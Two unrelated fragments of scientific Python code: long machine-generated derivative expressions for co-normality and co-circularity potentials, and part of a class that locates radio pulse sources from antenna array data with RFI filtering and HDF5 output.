2*cos_alpha_i*sin_alpha_i*u1*u2**2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
4*sin_alpha_i**2*u0**2*u1/vi_mag**4 +\
4*sin_alpha_i**2*u1**3/vi_mag**4 -\
4*sin_alpha_i**2*u1*u2**2/vi_mag**4 -\
4*sin_alpha_i**2*u1/vi_mag**2)
Dphi_nDu2 = (-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 -\
2*sin_alpha_j**2*v1*v2/vj_mag**2)*(-\
2*cos_alpha_i**2*u0*u2/vi_mag**2 + 4*\
cos_alpha_i*sin_alpha_i*u0*u2/vi_mag**3 +\
4*cos_alpha_i*sin_alpha_i*u1*u2**2/vi_mag**3 +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 -\
8*sin_alpha_i**2*u1*u2**2/vi_mag**4 +\
4*sin_alpha_i**2*u1/vi_mag**2) + (2*\
cos_alpha_i*sin_alpha_i*u1/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 -\
2*sin_alpha_j**2*v0*v2/vj_mag**2)*(2*cos_alpha_i**2*u1*u2/vi_mag**2 +\
4*cos_alpha_i*sin_alpha_i*u0*u2**2/vi_mag**3 -\
4*cos_alpha_i*sin_alpha_i*u1*u2/vi_mag**3 -\
8*sin_alpha_i**2*u0*u2**2/vi_mag**4 + 4*sin_alpha_i**2*u0/vi_mag**2 -\
2*sin_alpha_i**2*u1*u2/vi_mag**2) + (cos_alpha_i**2 -\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 +\
sin_alpha_j**2*v0**2/vj_mag**2 + sin_alpha_j**2*v1**2/vj_mag**2 -\
sin_alpha_j**2*v2**2/vj_mag**2)*(-\
2*cos_alpha_i*sin_alpha_i*u0**2*u2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u1**2*u2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u2**3/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u2/vi_mag +\
4*sin_alpha_i**2*u0**2*u2/vi_mag**4 +\
4*sin_alpha_i**2*u1**2*u2/vi_mag**4 -\
4*sin_alpha_i**2*u2**3/vi_mag**4 + 4*sin_alpha_i**2*u2/vi_mag**2)
return array([Dphi_nDu0,Dphi_nDu1,Dphi_nDu2])
"""
Derivative of co-normality potential wrt vj
"""
@jit( f8[:](f8[:], f8[:]), cache=True, nopython=True )
def Dphi_nDvj(vi, vj):
u0,u1,u2 = vi
v0,v1,v2 = vj
vi_mag_sqr = u0**2 + u1**2 + u2**2
vj_mag_sqr = v0**2 + v1**2 + v2**2
vi_mag = sqrt(vi_mag_sqr)
vj_mag = sqrt(vj_mag_sqr)
sin_alpha_i = sin( 0.5*vi_mag )
sin_alpha_j = sin( 0.5*vj_mag )
cos_alpha_i = cos( 0.5*vi_mag )
cos_alpha_j = cos( 0.5*vj_mag )
Dphi_nDv0 = (-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 -\
2*sin_alpha_j**2*v1*v2/vj_mag**2)*(2*cos_alpha_j**2*v0**2/vj_mag**2 -\
4*cos_alpha_j*sin_alpha_j*v0**2/vj_mag**3 -\
4*cos_alpha_j*sin_alpha_j*v0*v1*v2/vj_mag**3 +\
4*cos_alpha_j*sin_alpha_j/vj_mag - 2*sin_alpha_j**2*v0**2/vj_mag**2 +\
8*sin_alpha_j**2*v0*v1*v2/vj_mag**4) +\
(2*cos_alpha_i*sin_alpha_i*u1/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 -\
2*sin_alpha_j**2*v0*v2/vj_mag**2)*(-\
2*cos_alpha_j**2*v0*v1/vj_mag**2 - 4*\
cos_alpha_j*sin_alpha_j*v0**2*v2/vj_mag**3 +\
4*cos_alpha_j*sin_alpha_j*v0*v1/vj_mag**3 +\
8*sin_alpha_j**2*v0**2*v2/vj_mag**4 +\
2*sin_alpha_j**2*v0*v1/vj_mag**2 - 4*sin_alpha_j**2*v2/vj_mag**2) +\
(cos_alpha_i**2 - cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 +\
sin_alpha_j**2*v0**2/vj_mag**2 + sin_alpha_j**2*v1**2/vj_mag**2 -\
sin_alpha_j**2*v2**2/vj_mag**2)*(2*cos_alpha_j*sin_alpha_j*v0**3/\
vj_mag**3 + 2*cos_alpha_j*sin_alpha_j*v0*v1**2/vj_mag**3 -\
2*cos_alpha_j*sin_alpha_j*v0*v2**2/vj_mag**3 +\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag -\
4*sin_alpha_j**2*v0**3/vj_mag**4 -\
4*sin_alpha_j**2*v0*v1**2/vj_mag**4 +\
4*sin_alpha_j**2*v0*v2**2/vj_mag**4 +\
4*sin_alpha_j**2*v0/vj_mag**2)
Dphi_nDv1 = (-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 -\
2*sin_alpha_j**2*v1*v2/vj_mag**2)*(2*cos_alpha_j**2*v0*v1/vj_mag**2 -\
4*cos_alpha_j*sin_alpha_j*v0*v1/vj_mag**3 -\
4*cos_alpha_j*sin_alpha_j*v1**2*v2/vj_mag**3 -\
2*sin_alpha_j**2*v0*v1/vj_mag**2 +\
8*sin_alpha_j**2*v1**2*v2/vj_mag**4 -\
4*sin_alpha_j**2*v2/vj_mag**2) + (2*\
cos_alpha_i*sin_alpha_i*u1/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 -\
2*sin_alpha_j**2*v0*v2/vj_mag**2)*(-\
2*cos_alpha_j**2*v1**2/vj_mag**2 - 4*\
cos_alpha_j*sin_alpha_j*v0*v1*v2/vj_mag**3 +\
4*cos_alpha_j*sin_alpha_j*v1**2/vj_mag**3 -\
4*cos_alpha_j*sin_alpha_j/vj_mag +\
8*sin_alpha_j**2*v0*v1*v2/vj_mag**4 +\
2*sin_alpha_j**2*v1**2/vj_mag**2) + (cos_alpha_i**2 -\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 +\
sin_alpha_j**2*v0**2/vj_mag**2 + sin_alpha_j**2*v1**2/vj_mag**2 -\
sin_alpha_j**2*v2**2/vj_mag**2)*(2*cos_alpha_j*sin_alpha_j*v0**2*\
v1/vj_mag**3 + 2*cos_alpha_j*sin_alpha_j*v1**3/vj_mag**3 -\
2*cos_alpha_j*sin_alpha_j*v1*v2**2/vj_mag**3 +\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag -\
4*sin_alpha_j**2*v0**2*v1/vj_mag**4 -\
4*sin_alpha_j**2*v1**3/vj_mag**4 +\
4*sin_alpha_j**2*v1*v2**2/vj_mag**4 +\
4*sin_alpha_j**2*v1/vj_mag**2)
Dphi_nDv2 = (-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 -\
2*sin_alpha_j**2*v1*v2/vj_mag**2)*(2*cos_alpha_j**2*v0*v2/vj_mag**2 -\
4*cos_alpha_j*sin_alpha_j*v0*v2/vj_mag**3 -\
4*cos_alpha_j*sin_alpha_j*v1*v2**2/vj_mag**3 -\
2*sin_alpha_j**2*v0*v2/vj_mag**2 +\
8*sin_alpha_j**2*v1*v2**2/vj_mag**4 -\
4*sin_alpha_j**2*v1/vj_mag**2) + (2*\
cos_alpha_i*sin_alpha_i*u1/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 -\
2*sin_alpha_j**2*v0*v2/vj_mag**2)*(-\
2*cos_alpha_j**2*v1*v2/vj_mag**2 - 4*\
cos_alpha_j*sin_alpha_j*v0*v2**2/vj_mag**3 +\
4*cos_alpha_j*sin_alpha_j*v1*v2/vj_mag**3 +\
8*sin_alpha_j**2*v0*v2**2/vj_mag**4 - 4*sin_alpha_j**2*v0/vj_mag**2 +\
2*sin_alpha_j**2*v1*v2/vj_mag**2) + (cos_alpha_i**2 -\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 +\
sin_alpha_j**2*v0**2/vj_mag**2 + sin_alpha_j**2*v1**2/vj_mag**2 -\
sin_alpha_j**2*v2**2/vj_mag**2)*(2*cos_alpha_j*sin_alpha_j*v0**2*\
v2/vj_mag**3 + 2*cos_alpha_j*sin_alpha_j*v1**2*v2/vj_mag**3 -\
2*cos_alpha_j*sin_alpha_j*v2**3/vj_mag**3 +\
2*cos_alpha_j*sin_alpha_j*v2/vj_mag -\
4*sin_alpha_j**2*v0**2*v2/vj_mag**4 -\
4*sin_alpha_j**2*v1**2*v2/vj_mag**4 +\
4*sin_alpha_j**2*v2**3/vj_mag**4 - 4*sin_alpha_j**2*v2/vj_mag**2)
return array([Dphi_nDv0,Dphi_nDv1,Dphi_nDv2])
"""
Derivative of co-circularity potential wrt vi
"""
@jit( f8[:](f8[:], f8[:], f8[:], f8[:]), cache=True, nopython=True )
def Dphi_cDvi(vi, vj, xi, xj):
u0,u1,u2 = vi
v0,v1,v2 = vj
x0,x1,x2 = xi
y0,y1,y2 = xj
vi_mag_sqr = u0**2 + u1**2 + u2**2
vj_mag_sqr = v0**2 + v1**2 + v2**2
vi_mag = sqrt(vi_mag_sqr)
vj_mag = sqrt(vj_mag_sqr)
sin_alpha_i = sin( 0.5*vi_mag )
sin_alpha_j = sin( 0.5*vj_mag )
cos_alpha_i = cos( 0.5*vi_mag )
cos_alpha_j = cos( 0.5*vj_mag )
Dphi_cDu0 = ((-x0 +\
y0)*(2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 +\
2*sin_alpha_j**2*v0*v2/vj_mag**2) + (-x1 + y1)*(-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 +\
2*sin_alpha_j**2*v1*v2/vj_mag**2) + (-x2 + y2)*(cos_alpha_i**2 +\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 -\
sin_alpha_j**2*v0**2/vj_mag**2 - sin_alpha_j**2*v1**2/vj_mag**2 +\
sin_alpha_j**2*v2**2/vj_mag**2))*(2*(-x0 +\
y0)*(cos_alpha_i**2*u0*u1/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0**2*u2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u0*u1/vi_mag**3 -\
4*sin_alpha_i**2*u0**2*u2/vi_mag**4 -\
sin_alpha_i**2*u0*u1/vi_mag**2 + 2*sin_alpha_i**2*u2/vi_mag**2) +\
2*(-x1 + y1)*(-cos_alpha_i**2*u0**2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0**2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u0*u1*u2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i/vi_mag + sin_alpha_i**2*u0**2/vi_mag**2 -\
4*sin_alpha_i**2*u0*u1*u2/vi_mag**4) + 2*(-x2 + y2)*(-\
cos_alpha_i*sin_alpha_i*u0**3/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u0*u1**2/vi_mag**3 +\
cos_alpha_i*sin_alpha_i*u0*u2**2/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*sin_alpha_i**2*u0**3/vi_mag**4 + \
2*sin_alpha_i**2*u0*u1**2/vi_mag**4 -\
2*sin_alpha_i**2*u0*u2**2/vi_mag**4 -\
2*sin_alpha_i**2*u0/vi_mag**2))
Dphi_cDu1 = ((-x0 +\
y0)*(2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 +\
2*sin_alpha_j**2*v0*v2/vj_mag**2) + (-x1 + y1)*(-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 +\
2*sin_alpha_j**2*v1*v2/vj_mag**2) + (-x2 + y2)*(cos_alpha_i**2 +\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 -\
sin_alpha_j**2*v0**2/vj_mag**2 - sin_alpha_j**2*v1**2/vj_mag**2 +\
sin_alpha_j**2*v2**2/vj_mag**2))*(2*(-x0 +\
y0)*(cos_alpha_i**2*u1**2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u1*u2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u1**2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i/vi_mag -\
4*sin_alpha_i**2*u0*u1*u2/vi_mag**4 -\
sin_alpha_i**2*u1**2/vi_mag**2) + 2*(-x1 + y1)*(-\
cos_alpha_i**2*u0*u1/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u1/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u1**2*u2/vi_mag**3 +\
sin_alpha_i**2*u0*u1/vi_mag**2 -\
4*sin_alpha_i**2*u1**2*u2/vi_mag\
**4 + 2*sin_alpha_i**2*u2/vi_mag**2) + 2*(-x2 + y2)*(-\
cos_alpha_i*sin_alpha_i*u0**2*u1/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u1**3/vi_mag**3 +\
cos_alpha_i*sin_alpha_i*u1*u2**2/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*sin_alpha_i**2*u0**2*u1/vi_mag**4 +\
2*sin_alpha_i**2*u1**3/vi_mag**4 -\
2*sin_alpha_i**2*u1*u2**2/vi_mag**4 -\
2*sin_alpha_i**2*u1/vi_mag**2))
Dphi_cDu2 = ((-x0 +\
y0)*(2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 +\
2*sin_alpha_j**2*v0*v2/vj_mag**2) + (-x1 + y1)*(-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 +\
2*sin_alpha_j**2*v1*v2/vj_mag**2) + (-x2 + y2)*(cos_alpha_i**2 +\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 -\
sin_alpha_j**2*v0**2/vj_mag**2 - sin_alpha_j**2*v1**2/vj_mag**2 +\
sin_alpha_j**2*v2**2/vj_mag**2))*(2*(-x0 +\
y0)*(cos_alpha_i**2*u1*u2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u2**2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u1*u2/vi_mag**3 -\
4*sin_alpha_i**2*u0*u2**2/vi_mag**4 + 2*sin_alpha_i**2*u0/vi_mag**2 -\
sin_alpha_i**2*u1*u2/vi_mag**2) + 2*(-x1 + y1)*(-\
cos_alpha_i**2*u0*u2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u1*u2**2/vi_mag**3 +\
sin_alpha_i**2*u0*u2/vi_mag**2 -\
4*sin_alpha_i**2*u1*u2**2/vi_mag\
**4 + 2*sin_alpha_i**2*u1/vi_mag**2) + 2*(-x2 + y2)*(-\
cos_alpha_i*sin_alpha_i*u0**2*u2/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u1**2*u2/vi_mag**3 +\
cos_alpha_i*sin_alpha_i*u2**3/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u2/vi_mag +\
2*sin_alpha_i**2*u0**2*u2/vi_mag**4 +\
2*sin_alpha_i**2*u1**2*u2/vi_mag**4 -\
2*sin_alpha_i**2*u2**3/vi_mag**4 + 2*sin_alpha_i**2*u2/vi_mag**2))
return array([Dphi_cDu0,Dphi_cDu1,Dphi_cDu2])
"""
Derivative of co-circularity potential wrt vj
"""
@jit( f8[:](f8[:], f8[:], f8[:], f8[:]), cache=True, nopython=True )
def Dphi_cDvj(vi, vj, xi, xj):
u0,u1,u2 = vi
v0,v1,v2 = vj
x0,x1,x2 = xi
y0,y1,y2 = xj
vi_mag_sqr = u0**2 + u1**2 + u2**2
vj_mag_sqr = v0**2 + v1**2 + v2**2
vi_mag = sqrt(vi_mag_sqr)
vj_mag = sqrt(vj_mag_sqr)
sin_alpha_i = sin( 0.5*vi_mag )
sin_alpha_j = sin( 0.5*vj_mag )
cos_alpha_i = cos( 0.5*vi_mag )
cos_alpha_j = cos( 0.5*vj_mag )
Dphi_cDv0 = ((-x0 +\
y0)*(2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 +\
2*sin_alpha_j**2*v0*v2/vj_mag**2) + (-x1 + y1)*(-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 +\
2*sin_alpha_j**2*v1*v2/vj_mag**2) + (-x2 + y2)*(cos_alpha_i**2 +\
cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 -\
sin_alpha_j**2*v0**2/vj_mag**2 - sin_alpha_j**2*v1**2/vj_mag**2 +\
sin_alpha_j**2*v2**2/vj_mag**2))*(2*(-x0 +\
y0)*(cos_alpha_j**2*v0*v1/vj_mag**2 +\
2*cos_alpha_j*sin_alpha_j*v0**2*v2/vj_mag**3 -\
| |
boundingBox_center )/v_air
self.antenna_data_offsets[ant_i] = int(travel_time/5.0E-9)
### find max duration to any of the prefered antennas
max_duration = 0.0
for prefered_ant_i in self.station_to_antenna_indeces_dict[ self.prefered_station ]:
if prefered_ant_i == ant_i:
continue
duration, throw, throw = find_max_duration(self.antenna_locations[ prefered_ant_i ], self.antenna_locations[ant_i], self.bounding_box, boundingBox_center)
if duration > max_duration:
max_duration = duration
self.half_antenna_data_length[ant_i] = int(self.pulse_length/2) + int(duration/5.0E-9)
self.antenna_data_offsets[ant_i] -= self.half_antenna_data_length[ant_i]
#### now adjust the data offsets and antenna delays so they are consistent
## first we amount to adjust the offset by time delays mod the sampling time
offset_adjust = int( self.antenna_delays[ant_i]/5.0E-9 ) ##this needs to be added to offsets and subtracted from delays
## then we can adjust the delays accounting for the data offset
self.antenna_delays[ant_i] -= self.antenna_data_offsets[ant_i]*5.0E-9
##now we finally account for large time delays
self.antenna_data_offsets[ant_i] += offset_adjust
self.antenna_delays[ant_i] -= offset_adjust*5.0E-9
if (not self.use_core_stations_S1) or (not self.use_core_stations_S2):
core_filtered_ant_locs = np.array( self.antenna_locations[self.is_not_core] )
core_filtered_ant_delays = np.array( self.antenna_delays[self.is_not_core] )
#### allocate some memory ####
self.data_block = np.empty((self.num_antennas,self.block_size), dtype=np.complex)
self.hilbert_envelope_tmp = np.empty(self.block_size, dtype=np.double)
#### initialize stage 1 ####
if self.use_core_stations_S1:
self.trace_length_stage1 = 2*np.max(self.half_antenna_data_length )
S1_ant_locs = self.antenna_locations
S1_ant_delays = self.antenna_delays
else:
self.trace_length_stage1 = 2*np.max(self.half_antenna_data_length[self.is_not_core] )
S1_ant_locs = core_filtered_ant_locs
S1_ant_delays = core_filtered_ant_delays
self.trace_length_stage1 = 2**( int(np.log2( self.trace_length_stage1 )) + 1 )
self.stage_1_imager = II_tools.image_data_stage1(S1_ant_locs, S1_ant_delays, self.trace_length_stage1, self.upsample_factor)
#### initialize stage 2 ####
if self.use_core_stations_S2:
S2_ant_locs = self.antenna_locations
S2_ant_delays = self.antenna_delays
else:
S2_ant_locs = core_filtered_ant_locs
S2_ant_delays = core_filtered_ant_delays
self.trace_length_stage2 = 2**( int(np.log2( self.pulse_length )) + 1 )
self.stage_2_window = half_hann_window(self.pulse_length, self.hann_window_fraction)
self.stage_2_imager = II_tools.image_data_stage2_absBefore(S2_ant_locs, S2_ant_delays, self.trace_length_stage2, self.upsample_factor)
self.erasure_window = 1.0-self.stage_2_window
def save_header(self, h5_header_file):
header_group = h5_header_file.create_group("header")
header_group.attrs["timeID"] = self.timeID
header_group.attrs["bounding_box"] = self.bounding_box
header_group.attrs["pulse_length"] = self.pulse_length
header_group.attrs["num_antennas_per_station"] = self.num_antennas_per_station
header_group.attrs["stations_to_exclude"] = np.array(self.stations_to_exclude, dtype='S')
header_group.attrs["do_RFI_filtering"] = self.do_RFI_filtering
header_group.attrs["use_saved_RFI_info"] = self.use_saved_RFI_info
if self.initial_RFI_block is None:
header_group.attrs["initial_RFI_block"] = -1
else:
header_group.attrs["initial_RFI_block"] = self.initial_RFI_block
if self.RFI_num_blocks is None:
header_group.attrs["RFI_num_blocks"] = -1
else:
header_group.attrs["RFI_num_blocks"] = self.RFI_num_blocks
if self.RFI_max_blocks is None:
header_group.attrs["RFI_max_blocks"] = - 1
else:
header_group.attrs["RFI_max_blocks"] = self.RFI_max_blocks
header_group.attrs["block_size"] = self.block_size
header_group.attrs["upsample_factor"] = self.upsample_factor
header_group.attrs["max_events_perBlock"] = self.max_events_perBlock
header_group.attrs["min_pulse_amplitude"] = self.min_pulse_amplitude
header_group.attrs["min_pref_ant_amplitude"] = self.min_pref_ant_amplitude
header_group.attrs["positive_saturation"] = self.positive_saturation
header_group.attrs["negative_saturation"] = self.negative_saturation
header_group.attrs["saturation_removal_length"] = self.saturation_removal_length
header_group.attrs["hann_window_fraction"] = self.hann_window_fraction
header_group.attrs["stage_1_converg_num"] = self.stage_1_converg_num
header_group.attrs["stage_1_converg_radius"] = self.stage_1_converg_radius
header_group.attrs["stage_1_max_itters"] = self.stage_1_max_itters
header_group.attrs["use_core_stations_S1"] = self.use_core_stations_S1
header_group.attrs["use_core_stations_S2"] = self.use_core_stations_S2
header_group.attrs["stage_2_max_itter"] = self.stage_2_max_itters
header_group.attrs["stage_2_convergence_length"] = self.stage_2_convergence_length
header_group.attrs["stage_2_break_length"] = self.stage_2_break_length
header_group.attrs["prefered_station_name"] = self.prefered_station
header_group.attrs["trace_length_stage1"] = self.trace_length_stage1
header_group.attrs["trace_length_stage2"] = self.trace_length_stage2
header_group.attrs["erase_pulses"] = self.erase_pulses
header_group.attrs["prefered_station_timing_offset"] = self.prefered_station_timing_offset
header_group.attrs["remove_saturation"] = self.remove_saturation
# header_group.attrs["station_timing_offsets"] = self.station_timing_offsets
# header_group.attrs["additional_antenna_delays"] = self.additional_ant_delays
header_group.attrs["bad_antennas"] = np.array(self.bad_antennas, dtype='S')
header_group.attrs["polarization_flips"] = np.array(self.pol_flips, dtype='S')
no_core_i = 0
for ant_i, (station_i, station_ant_i) in enumerate(self.antennas_to_use):
data_file = self.input_files[station_i]
station = self.station_names[station_i]
ant_name = data_file.get_antenna_names()[ station_ant_i ]
antenna_group = header_group.create_group( str(ant_i) )
antenna_group.attrs["antenna_name"] = ant_name
antenna_group.attrs["location"] = self.antenna_locations[ant_i]
antenna_group.attrs["timing_delay"] = self.antenna_delays[ant_i]
antenna_group.attrs["half_window_length"] = self.half_antenna_data_length[ant_i]
antenna_group.attrs["data_offset"] = self.antenna_data_offsets[ant_i]
antenna_group.attrs["station"] = station
antenna_group.attrs["station_antenna_i"] = station_ant_i
antenna_group.attrs["with_core_ant_i"] = ant_i
if self.is_not_core[ant_i]:
antenna_group.attrs["no_core_ant_i"] = no_core_i
no_core_i += 1
else:
antenna_group.attrs["no_core_ant_i"] = np.nan
def process_block(self, start_index, block_index, h5_groupobject, log_func=do_nothing):
#### open and filter the data ####
prefered_ant_i = None
prefered_ant_dataLoss = np.inf
for ant_i, (station_i, station_ant_i) in enumerate(self.antennas_to_use):
data_file = self.input_files[station_i]
RFI_filter = self.RFI_filters[station_i]
offset = self.antenna_data_offsets[ant_i]
self.data_block[ant_i, :] = data_file.get_data(start_index+offset, self.block_size, antenna_index=station_ant_i) ## get the data. accounting for the offsets calculated earlier
if self.remove_saturation:
remove_saturation(self.data_block[ant_i, :], self.positive_saturation, self.negative_saturation, post_removal_length=self.saturation_removal_length,
half_hann_length=self.saturation_hann_window_length)
if ant_i in self.station_to_antenna_indeces_dict[ self.prefered_station ]: ## this must be done before filtering
num_D_zeros = num_double_zeros( self.data_block[ant_i, :] )
if num_D_zeros < prefered_ant_dataLoss: ## this antenna could be teh antenna, in the prefered station, with least data loss
prefered_ant_dataLoss = num_D_zeros
prefered_ant_i = ant_i
self.data_block[ant_i, :] = RFI_filter.filter( self.data_block[ant_i, :] )
### make output object ###
h5_groupobject = h5_groupobject.create_group(str(block_index))
h5_groupobject.attrs['block_index'] = block_index
h5_groupobject.attrs['start_index'] = start_index
h5_groupobject.attrs['prefered_ant_i'] = prefered_ant_i
#### find sources ####
np.abs( self.data_block[ prefered_ant_i ], out=self.hilbert_envelope_tmp )
for event_i in range(self.max_events_perBlock):
## find peak ##
peak_loc = np.argmax(self.hilbert_envelope_tmp[self.startBlock_exclusion : -self.endBlock_exclusion ]) + self.startBlock_exclusion
trace_start_loc = peak_loc - int( self.pulse_length/2 ) # pobably account for fact that trace is now longer than pulse_length on prefered antenna
if self.hilbert_envelope_tmp[peak_loc] < self.min_pref_ant_amplitude:
log_func("peaks are too small. Done searching")
break
## select data for stage one ##
s1_ant_i = 0
for ant_i, (station_i, station_ant_i) in enumerate(self.antennas_to_use):
if self.use_core_stations_S1 or self.is_not_core[ant_i]:
half_window_length = self.half_antenna_data_length[ant_i]
self.stage_1_imager.set_data( self.data_block[ant_i][trace_start_loc : trace_start_loc+2*half_window_length], s1_ant_i )
s1_ant_i += 1
## fft and xcorrelation ##
self.stage_1_imager.prepare_image( prefered_ant_i, self.min_pulse_amplitude )
log_func("source:", event_i)
stage_1_result, num_itter, num_stage1_itters = stochastic_minimizer(self.stage_1_imager.intensity, self.bounding_box, converg_num=self.stage_1_converg_num,
converg_rad=self.stage_1_converg_radius, max_itters=self.stage_1_max_itters)
stage_1_result.x[2] = np.abs(stage_1_result.x[2]) ## ensure Z is positive
log_func(" stoch. itters:", num_itter, num_stage1_itters, '{:4.2f}'.format(-stage_1_result.fun) )
log_func(" loc: {:d} {:d} {:d}".format(int(stage_1_result.x[0]), int(stage_1_result.x[1]), int(stage_1_result.x[2])) )
## select data for stage 2 ##
previous_solution = stage_1_result
converged = False
problem = False
for stage2loop_i in range(self.stage_2_max_itters):
in_X = self.bounding_box[0,0] < previous_solution.x[0] < self.bounding_box[0,1]
in_Y = self.bounding_box[1,0] < previous_solution.x[1] < self.bounding_box[1,1]
in_Z = self.bounding_box[2,0] < previous_solution.x[2] < self.bounding_box[2,1]
if (not in_X) or (not in_Y) or (not in_Z):
log_func("WARNING: point", previous_solution.x, "not in bounding box. Skipping.")
problem = True
else:
s2_ant_i = -1
for ant_i in range( self.num_antennas ):
if self.use_core_stations_S2 or self.is_not_core[ant_i]:
s2_ant_i += 1 ## do this here cause of break below
modeled_dt = -( np.linalg.norm( self.antenna_locations[ prefered_ant_i ]-previous_solution.x ) -
np.linalg.norm( self.antenna_locations[ant_i]-previous_solution.x ) )/v_air
A = modeled_dt
modeled_dt -= self.antenna_delays[ prefered_ant_i ] - self.antenna_delays[ant_i]
modeled_dt /= 5.0E-9
modeled_dt += peak_loc
modeled_dt = int(modeled_dt)
if modeled_dt+int(self.pulse_length/2) >= len(self.data_block[ant_i]):
log_func("unknown problem. LOC at", previous_solution.x)
problem = True
break
self.stage_2_imager.set_data( self.data_block[ant_i, modeled_dt-int(self.pulse_length/2):modeled_dt+int(self.pulse_length/2)]*self.stage_2_window, s2_ant_i, -modeled_dt*5.0E-9 )
if problem:
self.hilbert_envelope_tmp[peak_loc-int(self.pulse_length/2):peak_loc+int(self.pulse_length/2)] = 0.0
break
## fft and and xcorrelation ##
self.stage_2_imager.prepare_image( self.min_pulse_amplitude )
#
BB = np.array( [ [previous_solution.x[0]-50, previous_solution.x[0]+50], [previous_solution.x[1]-50, previous_solution.x[1]+50], [previous_solution.x[2]-50, previous_solution.x[2]+50] ] )
